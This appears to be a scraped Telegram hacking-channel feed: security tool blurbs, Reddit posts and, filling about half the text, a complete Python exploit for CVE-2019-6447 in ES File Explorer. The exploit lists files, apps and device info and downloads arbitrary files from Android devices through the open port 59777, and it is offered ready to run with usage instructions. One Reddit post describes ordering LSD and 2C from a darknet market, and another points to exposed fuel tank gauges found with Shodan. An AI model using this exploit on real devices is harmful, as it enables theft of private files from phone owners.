Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.9K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
Squalr : Squalr Memory Editor – Game Hacking Tool Written In C#

Squalr is performant Memory Editing software that allows users to create and share cheats in their windows desktop games. This includes memory scanning, pointers, x86/x64 assembly injection, and so on. Squalr achieves fast scans through multi-threading combined with SIMD instructions. See this article: SIMD in .NET. To take advantage of these gains, your CPU needs to have […]

The post Squalr : Squalr Memory Editor – Game Hacking Tool Written In C# appeared first on Kali Linux Tutorials.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
LocCheck : A Tool For Simplifying The Process Of Researching IOCs

LocCheck is a tool for simplifying the process of researching file hashes, IP addresses, and other indicators of compromise (IOCs). Features Look up hashes across multiple threat intelligence services, from a single command or a few lines of Python. Currenty supports the following services: VirusTotal MalwareBazaar Shodan.io Planned support: URLhaus OTX InQuest Labs MalShare Malpedia […]

The post LocCheck : A Tool For Simplifying The Process Of Researching IOCs appeared first on Kali Linux Tutorials.
Deep Web
Hello just need a lil help

I've been using the dark web alot but all of a sudden its telling me to disable javascript and I don't know how to do that on mobile or pc I use darkweb on mobile does anyone know how to do this?

submitted by /u/Beneficial_Loan_1487
[link] [comments]
Deep Web
LOVE LETTER ?? help!

Ok so the thing is that almost one year ago I got caught on the street of my city with MJ and then got a fine that I never paid. In the another hand, I've been ordering from the DM two times for very very very little orders and I've always received them with no problems. Today I received one letter from the goberment of my city to be seizured and I was wondering if I should pick It, ignore It or what... Do you think Love letters come in this way or It should be the fine...? I should check It?? Damn. I was planning on doing another order tomorrow but idk if I should do It or not. Some advice?? Thanks!! (The orders are just little am of Lucy (5tabs) and 1pill of 2C...)

submitted by /u/HumbleProfessional20
[link] [comments]
hacking: security in practice
Interesting ports and their services

Was looking through Shodan and I found out that gas stations have ATG(automatic tank gauges) and they mostly operate on port 10001. What are some interesting ports and services you've come across?

submitted by /u/Botoxed_Balls
[link] [comments]
hacking: security in practice
Text string that crashes text editors

I've seen in some youtube videos of people doing malware analysis that some hackers put at the end of their source code a string of characters that is not interpretable by text editors, and the only way to get the content of the file is to remove from the terminal the last line of the file and then open it.

Could someone tell me where to find this string and explain me why this happens? (I suppose it's because the characters inside are not interpretable, but it seems quite strange since it reminds me the iphone bug)

submitted by /u/Jefry99
[link] [comments]
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
ES File Explorer 4.1.9.7.4 Arbitrary File Read

https://2.bp.blogspot.com/-209TE5VbJR0/WWlvlKjkdxI/AAAAAAAAIQ8/gHk0ahoua8cqyTuIh5dYs6hAVa_ekYeoACLcBGAs/s1600/hack_img.png
ES File Explorer version 4.1.9.7.4 arbitrary file read exploit.

MD5 | 3c25d5c9cc6d583b07aa0211035656b6

Download
# Exploit Title: ES File Explorer 4.1.9.7.4 - Arbitrary File Read
# Date: 29/06/2021
# Exploit Author: Nehal Zaman
# Version: ES File Explorer v4.1.9.7.4
# Tested on: Android
# CVE : CVE-2019-6447

import requests
import json
import ast
import sys

if len(sys.argv) < 3:
print(f"USAGE {sys.argv[0]} <ip[file to download]")
sys.exit(1)

url = 'http://' + sys.argv[2] + ':59777'
cmd = sys.argv[1]
cmds = ['listFiles','listPics','listVideos','listAudios','listApps','listAppsSystem','listAppsPhone','listAppsSdcard','listAppsAll','getFile','getDeviceInfo']
listCmds = cmds[:9]
if cmd not in cmds:
print("[-] WRONG COMMAND!")
print("Available commands : ")
print(" listFiles : List all Files.")
print(" listPics : List all Pictures.")
print(" listVideos : List all videos.")
print(" listAudios : List all audios.")
print(" listApps : List Applications installed.")
print(" listAppsSystem : List System apps.")
print(" listAppsPhone : List Communication related apps.")
print(" listAppsSdcard : List apps on the SDCard.")
print(" listAppsAll : List all Application.")
print(" getFile : Download a file.")
print(" getDeviceInfo : Get device info.")
sys.exit(1)

print("\n==================================================================")
print("| ES File Explorer Open Port Vulnerability : CVE-2019-6447 |")
print("| Coded By : Nehal a.k.a PwnerSec |")
print("==================================================================\n")

header = {"Content-Type" : "application/json"}
proxy = {"http":"http://127.0.0.1:8080", "https":"https://127.0.0.1:8080"}

def httpPost(cmd):
data = json.dumps({"command":cmd})
response = requests.post(url, headers=header, data=data)
return ast.literal_eval(response.text)

def parse(text, keys):
for dic in text:
for key in keys:
print(f"{key} : {dic[key]}")
print('')

def do_listing(cmd):
response = httpPost(cmd)
if len(response) == 0:
keys = []
else:
keys = list(response[0].keys())
parse(response, keys)

if cmd in listCmds:
do_listing(cmd)

elif cmd == cmds[9]:
if len(sys.argv) != 4:
print("[+] Include file name to download.")
sys.exit(1)
elif sys.argv[3][0] != '/':
print("[-] You need to provide full path of the file.")
sys.exit(1)
else:
path = sys.argv[3]
print("[+] Downloading file...")
response = requests.get(url + path)
with open('out.dat','wb') as wf:
wf.write(response.content)
print("[+] Done. Saved as `out.dat`.")

elif cmd == cmds[10]:
response = httpPost(cmd)
keys = list(response.keys())
for key in keys:
print(f"{key} : {response[key]}")


Source:packetstormsecurity.com